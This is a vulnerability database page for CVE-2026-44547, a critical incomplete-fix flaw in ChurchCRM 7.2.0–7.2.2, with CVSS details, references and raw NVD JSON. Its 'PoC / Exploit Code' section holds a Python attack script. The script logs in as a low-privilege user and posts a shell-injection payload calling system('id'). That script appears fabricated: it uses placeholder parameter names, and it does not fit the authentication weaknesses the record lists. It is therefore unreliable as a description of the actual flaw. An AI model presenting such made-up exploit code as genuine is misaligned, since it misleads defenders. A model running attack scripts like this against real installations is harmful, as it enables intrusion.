Security Vulnerability Report
CVE-2026-44547 CVSS 9.6 CRITICAL

CVE-2026-44547

Published: 2026-05-12 23:16:19
Last Modified: 2026-05-12 23:16:19

Description

ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, the fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

ChurchCRM 7.2.0
ChurchCRM 7.2.1
ChurchCRM 7.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: ChurchCRM 7.2.0 - 7.2.2 RCE (CVE-2026-44547)
# Description: PoC for exploiting incomplete fix in public-user.php

import requests

target_url = "http://target-churchcrm/src/api/routes/public/public-user.php"
session = requests.Session()

# Step 1: Login as low privilege user (PR:L)
login_data = {
    "User": "lowpriv_user",
    "Password": "password123"
}
session.post("http://target-churchcrm/session/begin", data=login_data)

# Step 2: Send malicious payload to vulnerable endpoint
# Payload is constructed based on the original CVE-2026-4058 PoC
payload = {
    "action": "exploit_function",
    "malicious_param": "'; system('id'); #"
}
response = session.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful!")
    print(response.text)
else:
    print("[-] Exploit failed.")

References

https://github.com/ChurchCRM/CRM/pull/8855
https://github.com/ChurchCRM/CRM/security/advisories/GHSA-cwp8-rm8g-q5c9

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44547", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:18.610", "lastModified": "2026-05-12T23:16:18.610", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-304"}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/pull/8855", "source": "[email protected]"}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-cwp8-rm8g-q5c9", "source": "[email protected]"}]}}